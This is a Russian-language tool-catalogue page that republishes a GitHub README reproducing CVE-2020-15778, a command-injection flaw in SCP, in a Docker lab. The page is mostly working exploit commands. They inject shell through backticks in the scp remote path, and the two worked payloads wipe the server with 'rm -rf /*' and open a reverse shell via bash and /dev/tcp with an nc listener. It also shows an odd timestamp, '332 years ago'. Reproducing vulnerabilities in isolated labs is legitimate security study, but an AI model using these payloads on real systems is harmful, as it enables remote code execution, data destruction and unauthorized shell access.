Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-15778 — Воспроизводит эксплойт внедрения команд SCP CVE-2020-15778 с Docker-настройкой клиент-сервер для тестирования удаленного выполнения кода и реверс-шелл пейлоадов. | Kitploit
Инструменты/GitHubGitHub/yifanzhg/cve-2020-15778
Безопасность контейнеровАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubyifanzhg/cve-2020-15778

CVE-2020-15778

Воспроизводит эксплойт внедрения команд SCP CVE-2020-15778 с Docker-настройкой клиент-сервер для тестирования удаленного выполнения кода и реверс-шелл пейлоадов.

Репозиторий
332 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-15778

Введение

Этот репозиторий воспроизводит CVE-2020-15778.

Шаги

  1. Соберите docker-образы для сервера и клиента scp
root@kitploit:~
cd client
docker build -t client-cve .
root@kitploit:~
cd server
docker build -t server-cve .
  1. Запустите scp-сервер в контейнере.
root@kitploit:~
docker run -d -P --name scp-server server-cve

Получите внутренний IP-адрес scp-сервера с помощью

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
  1. Запустите клиент в контейнере.
root@kitploit:~
docker run --name scp-client -i -t client-cve
  1. Внедрите собственную команду shell в scp-сервер, вызвав команду scp в клиенте.

В терминале клиента выполните

root@kitploit:~
scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'

Пароль — «PASSWORD».

Примеры

Вот несколько примеров использования этой уязвимости.

  1. Удалите все на сервере, чтобы вывести его из строя.
root@kitploit:~
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
  1. Перенаправьте bash scp-сервера в клиент (имитация ssh).

Прослушивайте порт на клиентской машине.

root@kitploit:~
nc -lvvp 8080

Используйте scp, чтобы заставить сервер перенаправить интерактивный bash на клиентскую машину.

root@kitploit:~
scp nil.txt root@<internal IP of scp client>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>& 1`/tmp'

IP-адрес клиента можно получить с помощью

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
Скачать инструмент